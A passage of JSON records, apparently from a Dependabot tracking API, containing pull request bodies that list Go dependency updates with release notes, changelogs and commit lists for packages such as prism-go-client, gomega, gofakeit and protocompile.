href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Add V4 DomainManager service, User Service and SubnetIPReservation methods by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/322\"\u003enutanix-cloud-native/prism-go-client#322\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/219\"\u003e#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/316\"\u003e#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/317\"\u003e#317\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs to include VM vTPM configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved the v4 storage container client from storage namespace as it was based on the v4 alpha APIs which are no longer supported.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d66a76f1aec01d16e09309e3301ba0cd602a8f17\"\u003e\u003ccode\u003ed66a76f\u003c/code\u003e\u003c/a\u003e converged: add DeleteCdRom and GenerateConsoleToken to VMs service\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/0104740467e050461f068ebe465fc057af09f283\"\u003e\u003ccode\u003e0104740\u003c/code\u003e\u003c/a\u003e Adding changes to support error handling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/c121d041c92a637edaaed197419192aa79a88141\"\u003e\u003ccode\u003ec121d04\u003c/code\u003e\u003c/a\u003e feat: Adding api call to add customAttributes to VM (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/334\"\u003e#334\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2a1c8de076a0786faa16f7ee2cd03f3d8e474e77\"\u003e\u003ccode\u003e2a1c8de\u003c/code\u003e\u003c/a\u003e chore: bump jetlify action to v0.14.0 (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2bbbcd3103a542465227608d314804befbbcd3c1\"\u003e\u003ccode\u003e2bbbcd3\u003c/code\u003e\u003c/a\u003e fix: V4 API fixes for Objects Lite upload and configurable timeouts  (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/8b4db79f4c6750828da9466c0d49e74986b447a7\"\u003e\u003ccode\u003e8b4db79\u003c/code\u003e\u003c/a\u003e feat: add Images, Templates, and OVAs services for V4 packer migration (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/75efe03848ff09e1a6a00b8e06247d546986d677\"\u003e\u003ccode\u003e75efe03\u003c/code\u003e\u003c/a\u003e fix: removed usused Karbon APIs and renames in-use APIs to Konnector (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d23758422537995b8c946153f5d2bf949b430a55\"\u003e\u003ccode\u003ed237584\u003c/code\u003e\u003c/a\u003e fix(bumup): updating ntnx-api-golang-clients to latest versions (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/323\"\u003e#323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d8d91a890f00890b90ee61560e7400c07a601e75\"\u003e\u003ccode\u003ed8d91a8\u003c/code\u003e\u003c/a\u003e feat: Implement DomainManager service with GetPrismCentralVersion (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/318\"\u003e#318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/037b98630f382132c9d896e721d01e61da3650c9\"\u003e\u003ccode\u003e037b986\u003c/code\u003e\u003c/a\u003e feat: Implement List and Get methods for Users service (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.3.4...v0.7.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.38.2 to 1.39.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.39.1\u003c/h2\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003ev1.39.0\u003c/h2\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003ev1.38.3\u003c/h2\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/gomega's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/1a25a36414f51967615277623eed3b85b0ca6ce8\"\u003e\u003ccode\u003e1a25a36\u003c/code\u003e\u003c/a\u003e v1.39.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/406faee2de82aa2584ea4d76b0e2662f70ae4d2c\"\u003e\u003ccode\u003e406faee\u003c/code\u003e\u003c/a\u003e bump all deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/49561ad293853e660030f8397b07607127e3ebb7\"\u003e\u003ccode\u003e49561ad\u003c/code\u003e\u003c/a\u003e v1.39.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/8f7f42585ccc794dcb3a4979ac7d67e00fb070ae\"\u003e\u003ccode\u003e8f7f425\u003c/code\u003e\u003c/a\u003e document MatchErrorStrictly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/bae643da0469185d9502e8d7528da137f4c62320\"\u003e\u003ccode\u003ebae643d\u003c/code\u003e\u003c/a\u003e add matcher relecting errors.Is behavior\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/a3ca2ca026268dc6acfc60a2e8393b33b428c507\"\u003e\u003ccode\u003ea3ca2ca\u003c/code\u003e\u003c/a\u003e v1.38.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/4dada364c7635fffe6b8a6b45a7588dabd64cdf4\"\u003e\u003ccode\u003e4dada36\u003c/code\u003e\u003c/a\u003e fix failing hav...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10730","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10730","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10730/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-04-05T19:20:06.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4208385040","node_id":"PR_kwDONfDiq87QEjOg","number":58,"state":"closed","title":"build(deps): bump the go-minor-and-patch group across 1 directory with 11 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-20T10:33:54.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-05T19:20:06.000Z","updated_at":"2026-04-20T10:33:56.000Z","time_to_close":1264428,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"go-minor-and-patch","update_count":11,"packages":[{"name":"github.com/brianvoe/gofakeit/v7","old_version":"7.14.0","new_version":"7.14.1","repository_url":"https://github.com/brianvoe/gofakeit"},{"name":"github.com/bufbuild/protocompile","old_version":"0.4.0","new_version":"0.14.1","repository_url":"https://github.com/bufbuild/protocompile"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.3.0","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/hashicorp/go-plugin","old_version":"1.6.3","new_version":"1.7.0","repository_url":"https://github.com/hashicorp/go-plugin"},{"name":"github.com/pb33f/libopenapi","old_version":"0.22.3","new_version":"0.35.1","repository_url":"https://github.com/pb33f/libopenapi"},{"name":"github.com/pb33f/libopenapi-validator","old_version":"0.4.7","new_version":"0.13.3","repository_url":"https://github.com/pb33f/libopenapi-validator"},{"name":"github.com/aws/aws-lambda-go","old_version":"1.49.0","new_version":"1.54.0","repository_url":"https://github.com/aws/aws-lambda-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":null,"ecosystem":"go"},"body":"Bumps the go-minor-and-patch group with 8 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/brianvoe/gofakeit/v7](https://github.com/brianvoe/gofakeit) | `7.14.0` | `7.14.1` |\n| [github.com/bufbuild/protocompile](https://github.com/bufbuild/protocompile) | `0.4.0` | `0.14.1` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.3.0` | `5.3.1` |\n| [github.com/hashicorp/go-plugin](https://github.com/hashicorp/go-plugin) | `1.6.3` | `1.7.0` |\n| [github.com/pb33f/libopenapi](https://github.com/pb33f/libopenapi) | `0.22.3` | `0.35.1` |\n| [github.com/pb33f/libopenapi-validator](https://github.com/pb33f/libopenapi-validator) | `0.4.7` | `0.13.3` |\n| [github.com/aws/aws-lambda-go](https://github.com/aws/aws-lambda-go) | `1.49.0` | `1.54.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n\n\nUpdates `github.com/brianvoe/gofakeit/v7` from 7.14.0 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/ee08eae8003a40768c47bacd76dfa5503a461752\"\u003e\u003ccode\u003eee08eae\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/brianvoe/gofakeit/issues/392\"\u003e#392\u003c/a\u003e from shubhamatkal/fix/password-guarantee-character-sets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/c38fe1a8fb22e850fbdbbe2a54d5954a60e13a65\"\u003e\u003ccode\u003ec38fe1a\u003c/code\u003e\u003c/a\u003e github - workflow less verbose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/22b91127ddcc896b66a389c2c00b73985091d11c\"\u003e\u003ccode\u003e22b9112\u003c/code\u003e\u003c/a\u003e datetime - yearly fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/35520064411e85a403d4b41f22d3269604871e20\"\u003e\u003ccode\u003e3552006\u003c/code\u003e\u003c/a\u003e fix: guarantee at least one char per enabled set in Password()\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/brianvoe/gofakeit/compare/v7.14.0...v7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bufbuild/protocompile` from 0.4.0 to 0.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bufbuild/protocompile/releases\"\u003egithub.com/bufbuild/protocompile's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eBugfixes changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug where extension declarations marked as reserved would not allow the \u003ccode\u003efull_name\u003c/code\u003e or \u003ccode\u003etype\u003c/code\u003e fields to be specified. This failed to mirror the corresponding rule in the reference compiler \u003ccode\u003eprotoc\u003c/code\u003e, which allows them to be set for documentation purposes. Now these two fields can be used on reserved declarations as long as both are present. By \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/327\"\u003e#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix panic and error-reporting anomalies that can occur when interpreting options in lenient mode via calling either \u003ccode\u003eoptions.InterpretOptionsLenient\u003c/code\u003e or \u003ccode\u003eoptions.InterpretUnlinkedOptions\u003c/code\u003e. By \u003ca href=\"https://github.com/jhump\"\u003e\u003ccode\u003e@​jhump\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/331\"\u003e#331\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protocompile/compare/v0.14.0...v0.14.1\"\u003ehttps://github.com/bufbuild/protocompile/compare/v0.14.0...v0.14.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003cp\u003eThis version makes Protobuf Editions available to users of this package, without needing to use a special opt-in that is documented as test-only. It contains one backwards-incompatible change, only for users that used that Editions opt-in: it has been removed since the functionality is now generally available.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eBugfixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrectly handle groups in the \u003ccode\u003eTextName\u003c/code\u003e method of field descriptors created by the compiler in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/297\"\u003e#297\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix bug in extension declarations: presence of a declaration implies the range is verified in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/303\"\u003e#303\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix a typo in code that adapts/re-parses features to match a descriptor; addresses a bug in \u003ccode\u003eprotoutil.ResolveCustomFeature\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/305\"\u003e#305\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd more thorough checks for when to adapt a value when resolving custom feature; addresses a deficiency in \u003ccode\u003eprotoutil.ResolveCustomFeature\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/306\"\u003e#306\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCorrectly handle maps in the \u003ccode\u003eKind\u003c/code\u003e method of field descriptors created by the compiler, in files that define a file-wide default of delimited encoding for messages in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/312\"\u003e#312\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003egoogle/protobuf/cpp_features.proto\u003c/code\u003e, \u003ccode\u003egoogle/protobuf/java_features.proto\u003c/code\u003e, and \u003ccode\u003egoogle/protobuf/go_features.proto\u003c/code\u003e to the set of files provided by \u003ccode\u003eprotocomile.WithStandardImports\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/295\"\u003e#295\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd some final checks to mirror logic of protoc v27.0: files cannot use custom features defined in the same file, enforce \u0026quot;feature support\u0026quot; options, which define the editions in which a feature and/or feature value can be used in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/301\"\u003e#301\u003c/a\u003e and \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/309\"\u003e#309\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnable support for Protobuf Editions. To start, this only supports edition 2023. Added in \u003ca href=\"https://redirect.github.com/bufbuild/protocompile/issues/301\"\u003e#301\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThis contains a \u003cstrong\u003ebackwards-incompatible\u003c/strong\u003e change: the \u003ccode\u003eeditionstesting.AllowEditions()\u003c/code\u003e function (which was documented as temporary when introduced in v0.10.0) has been removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003ewellknownimports\u003c/code\u003e package, for providing actual source code for the standard imports (\u003ccode\u003ewellknownimports.WithStandardImports\u003c/code\u003e is an alternative to \u003ccode\u003eprotocompile.WithStandardImports\u003c/code\u003e) in \u003ca 